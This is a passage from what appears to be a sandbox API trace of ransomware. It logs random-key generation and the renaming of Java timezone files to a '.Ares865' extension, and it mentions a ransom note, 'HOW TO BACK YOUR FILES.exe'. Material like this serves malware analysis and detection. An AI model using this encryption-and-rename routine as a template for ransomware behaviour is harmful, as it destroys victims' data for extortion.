dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.776] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.776] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.779] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.780] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.780] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.780] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Makassar" | out: lpString1="Makassar") returned="Makassar" [0134.780] lstrlenW (lpString="Makassar") returned 8 [0134.780] lstrlenW (lpString="Ares865") returned 7 [0134.780] lstrcmpiW (lpString1="akassar", lpString2="Ares865") returned -1 [0134.781] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar.Ares865") returned 61 [0134.781] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar.ares865"), dwFlags=0x1) returned 1 [0134.782] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Makassar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\makassar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.783] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=85) returned 1 [0134.783] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.783] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.783] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.786] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.787] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.787] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.787] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Manila" | out: lpString1="Manila") returned="Manila" [0134.787] lstrlenW (lpString="Manila") returned 6 [0134.787] lstrlenW (lpString="Ares865") returned 7 [0134.788] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila.Ares865") returned 59 [0134.788] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila.ares865"), dwFlags=0x1) returned 1 [0134.789] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Manila.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\manila.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.789] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=125) returned 1 [0134.790] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.791] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.791] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.794] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.794] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.794] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.795] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Muscat.Ares865" | out: lpString1="Muscat.Ares865") returned="Muscat.Ares865" [0134.795] lstrlenW (lpString="Muscat.Ares865") returned 14 [0134.795] lstrlenW (lpString="Ares865") returned 7 [0134.795] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0134.795] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x745eda20, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x745eda20, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x745eda20, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Nicosia", cAlternateFileName="")) returned 1 [0134.795] lstrcmpiW (lpString1="Nicosia", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0134.795] lstrcmpiW (lpString1="Nicosia", lpString2="aoldtz.exe") returned 1 [0134.795] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Nicosia" | out: lpString1="Nicosia") returned="Nicosia" [0134.795] lstrlenW (lpString="Nicosia") returned 7 [0134.795] lstrlenW (lpString="Ares865") returned 7 [0134.796] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia.Ares865") returned 60 [0134.796] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia.ares865"), dwFlags=0x1) returned 1 [0134.798] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Nicosia.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\nicosia.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.798] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1116) returned 1 [0134.798] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.799] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.799] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.801] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.802] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.802] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.802] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Novokuznetsk" | out: lpString1="Novokuznetsk") returned="Novokuznetsk" [0134.802] lstrlenW (lpString="Novokuznetsk") returned 12 [0134.802] lstrlenW (lpString="Ares865") returned 7 [0134.802] lstrcmpiW (lpString1="uznetsk", lpString2="Ares865") returned 1 [0134.803] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk.Ares865") returned 65 [0134.803] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk.ares865"), dwFlags=0x1) returned 1 [0134.804] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novokuznetsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novokuznetsk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.804] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0134.805] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.805] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.805] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.808] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.809] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.809] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.810] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Novosibirsk" | out: lpString1="Novosibirsk") returned="Novosibirsk" [0134.810] lstrlenW (lpString="Novosibirsk") returned 11 [0134.810] lstrlenW (lpString="Ares865") returned 7 [0134.810] lstrcmpiW (lpString1="sibirsk", lpString2="Ares865") returned 1 [0134.810] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk.Ares865") returned 64 [0134.810] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk.ares865"), dwFlags=0x1) returned 1 [0134.812] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Novosibirsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\novosibirsk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.812] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=589) returned 1 [0134.812] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.813] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.813] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.815] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.816] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.816] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.817] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Omsk" | out: lpString1="Omsk") returned="Omsk" [0134.817] lstrlenW (lpString="Omsk") returned 4 [0134.817] lstrlenW (lpString="Ares865") returned 7 [0134.817] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk.Ares865") returned 57 [0134.817] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk.ares865"), dwFlags=0x1) returned 1 [0134.819] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Omsk.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\omsk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.819] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=581) returned 1 [0134.819] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.820] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.820] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.823] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.824] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.824] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.824] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Oral" | out: lpString1="Oral") returned="Oral" [0134.824] lstrlenW (lpString="Oral") returned 4 [0134.824] lstrlenW (lpString="Ares865") returned 7 [0134.825] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral.Ares865") returned 57 [0134.825] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral.ares865"), dwFlags=0x1) returned 1 [0134.826] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Oral.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\oral.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.827] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=461) returned 1 [0134.827] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.828] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.828] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.830] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.831] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.831] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.832] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Phnom_Penh" | out: lpString1="Phnom_Penh") returned="Phnom_Penh" [0134.832] lstrlenW (lpString="Phnom_Penh") returned 10 [0134.832] lstrlenW (lpString="Ares865") returned 7 [0134.832] lstrcmpiW (lpString1="om_Penh", lpString2="Ares865") returned 1 [0134.832] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh.Ares865") returned 63 [0134.832] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh.ares865"), dwFlags=0x1) returned 1 [0134.834] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Phnom_Penh.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\phnom_penh.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.834] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=97) returned 1 [0134.834] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.835] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.835] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.838] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.838] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.838] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.839] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Pontianak" | out: lpString1="Pontianak") returned="Pontianak" [0134.839] lstrlenW (lpString="Pontianak") returned 9 [0134.839] lstrlenW (lpString="Ares865") returned 7 [0134.839] lstrcmpiW (lpString1="ntianak", lpString2="Ares865") returned 1 [0134.839] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak.Ares865") returned 62 [0134.839] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak.ares865"), dwFlags=0x1) returned 1 [0134.841] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pontianak.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pontianak.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.841] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=125) returned 1 [0134.841] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.842] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.842] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.845] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.846] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.846] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.846] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Pyongyang" | out: lpString1="Pyongyang") returned="Pyongyang" [0134.846] lstrlenW (lpString="Pyongyang") returned 9 [0134.846] lstrlenW (lpString="Ares865") returned 7 [0134.846] lstrcmpiW (lpString1="ongyang", lpString2="Ares865") returned 1 [0134.847] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang.Ares865") returned 62 [0134.847] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang.ares865"), dwFlags=0x1) returned 1 [0134.849] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Pyongyang.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\pyongyang.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.849] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=101) returned 1 [0134.849] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.850] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.850] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.852] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.853] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.853] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.854] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Qatar" | out: lpString1="Qatar") returned="Qatar" [0134.854] lstrlenW (lpString="Qatar") returned 5 [0134.854] lstrlenW (lpString="Ares865") returned 7 [0134.854] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar.Ares865") returned 58 [0134.854] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar.ares865"), dwFlags=0x1) returned 1 [0134.865] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qatar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qatar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.865] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=77) returned 1 [0134.865] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.866] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.866] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.869] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0134.870] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0134.870] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.870] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Qyzylorda" | out: lpString1="Qyzylorda") returned="Qyzylorda" [0134.870] lstrlenW (lpString="Qyzylorda") returned 9 [0134.870] lstrlenW (lpString="Ares865") returned 7 [0134.870] lstrcmpiW (lpString1="zylorda", lpString2="Ares865") returned 1 [0134.871] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda.Ares865") returned 62 [0134.871] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda.ares865"), dwFlags=0x1) returned 1 [0134.873] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Asia\\Qyzylorda.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\asia\\qyzylorda.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0134.873] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=465) returned 1 [0134.873] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0134.874] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0134.874] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0134.877] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 